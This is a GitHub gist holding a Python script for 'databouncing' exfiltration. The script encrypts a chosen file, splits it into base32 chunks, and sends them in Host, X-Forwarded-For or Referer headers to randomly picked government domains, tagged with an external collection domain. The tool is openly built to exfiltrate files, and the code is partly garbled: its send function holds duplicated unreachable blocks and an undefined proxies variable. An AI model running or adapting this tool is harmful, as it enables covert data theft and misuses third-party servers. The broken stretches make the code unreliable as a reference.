Created
September 23, 2023 09:02
-
-
Save yosignals/40cf690e3d91dbe6a268c6f9d7b10064 to your computer and use it in GitHub Desktop.
Check your dependencies :) - https://thecontractor.io/databouncing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import hashlib | |
| import os | |
| import base64 | |
| import random | |
| import requests | |
| import uuid | |
| from cryptography.fernet import Fernet | |
| from cryptography.hazmat.primitives import hashes | |
| from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC | |
| from cryptography.hazmat.backends import default_backend | |
| CHUNK_SIZE = 63 # Bytes | |
| def encrypt_aes(data, password): | |
| salt = os.urandom(16) | |
| kdf = PBKDF2HMAC( | |
| algorithm=hashes.SHA256(), | |
| length=32, | |
| salt=salt, | |
| iterations=100000, | |
| backend=default_backend() | |
| ) | |
| key = base64.urlsafe_b64encode(kdf.derive(password.encode())) | |
| cipher_suite = Fernet(key) | |
| encrypted_data = cipher_suite.encrypt(data) | |
| return salt + encrypted_data | |
| def send_chunked_request(data, domain, header_type, exfil, file_id, chunk_id, total_chunks, uuid_key): | |
| encoded_data = base64.b32encode(data).decode().rstrip('=').lower() # URL-safe base32 encoding | |
| header_value = f"{uuid_key}.{file_id}.{chunk_id}.{total_chunks}.{encoded_data}.{exfil}" | |
| headers = {header_type: header_value} | |
| url = f"http://{domain}/" | |
| try: | |
| requests.get(url, headers=headers) | |
| except requests.RequestException: | |
| pass | |
| UA = { | |
| "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15" | |
| } | |
| encoded_data = base64.b32encode(data).decode().rstrip('=') | |
| modified_data = f"{uuid_key}.{file_id}.{chunk_id}.{total_chunks}.{encoded_data}.{exfil}" | |
| url = f"http://{domain}" | |
| header_map = { | |
| "host": "Host", | |
| "xff": "X-Forwarded-For", | |
| "ref": "Referer" | |
| } | |
| header_value = header_map.get(header_type.lower()) | |
| if not header_value: | |
| print(f"Unsupported header_type: {header_type}") | |
| return | |
| UA[header_value] = modified_data | |
| print(f"URL: {url}") | |
| print(f"Headers: {UA}") | |
| # Ignoring redirects with allow_redirects=False | |
| requests.get(url, headers=UA, proxies=proxies, verify=False, allow_redirects=False) | |
| UA = { | |
| "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15" | |
| } | |
| encoded_data = base64.b32encode(data).decode().rstrip('=') | |
| modified_data = f"{uuid_key}.{file_id}.{chunk_id}.{total_chunks}.{encoded_data}.{exfil}" | |
| url = f"https://{domain}" | |
| header_map = { | |
| "host": "Host", | |
| "xff": "X-Forwarded-For", | |
| "ref": "Referer" | |
| } | |
| header_value = header_map.get(header_type.lower()) | |
| if not header_value: | |
| print(f"Unsupported header_type: {header_type}") | |
| return | |
| UA[header_value] = modified_data | |
| print(f"URL: {url}") | |
| print(f"Headers: {UA}") | |
| response = requests.get(url, headers=UA, proxies=proxies, verify=False, stream=True) | |
| response.close() | |
| def send_file_chunks(file_path, uuid_key, password, exfil, number_of_times): | |
| with open(file_path, "rb") as f: | |
| file_data = f.read() | |
| encrypted_data = encrypt_aes(file_data, password) | |
| file_hash = hashlib.sha1(file_data).hexdigest() | |
| chunks = [encrypted_data[i:i+CHUNK_SIZE] for i in range(0, len(encrypted_data), CHUNK_SIZE)] | |
| total_chunks = len(chunks) | |
| with open("gov.domains.txt", "r") as f: | |
| domains = f.readlines() | |
| chosen_domain = random.choice(domains).strip() | |
| prefix, target_domain = chosen_domain.split('.', 1) | |
| send_chunked_request(file_hash.encode(), target_domain, prefix, exfil, file_hash[:10], 0, total_chunks, uuid_key) | |
| for _ in range(number_of_times): | |
| for idx, chunk in enumerate(chunks, start=1): | |
| chosen_domain = random.choice(domains).strip() | |
| prefix, target_domain = chosen_domain.split('.', 1) | |
| send_chunked_request(chunk, target_domain, prefix, exfil, file_hash[:10], idx, total_chunks, uuid_key) | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser(description="Send file chunks via headers.") | |
| parser.add_argument("-f", "--file", dest="file_path", required=True, help="Path to the file to exfiltrate.") | |
| parser.add_argument("-u", "--uuid", dest="uuid_key", required=True, help="UUID key for the file.") | |
| parser.add_argument("-p", "--password", required=True, help="Password for AES encryption.") | |
| parser.add_argument("-e", "--exfil", required=True, help="External domain suffix for headers.") | |
| parser.add_argument("-n", "--number-of-times", dest="number_of_times", type=int, required=True, help="Number of times to send each chunk.") | |
| args = parser.parse_args() | |
| proxies = { | |
| "http": "http://127.0.0.1:8080", | |
| "https": "http://127.0.0.1:8080", | |
| } | |
| requests.packages.urllib3.disable_warnings() # Suppress warnings | |
| send_file_chunks(args.file_path, args.uuid_key, args.password, args.exfil, args.number_of_times) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment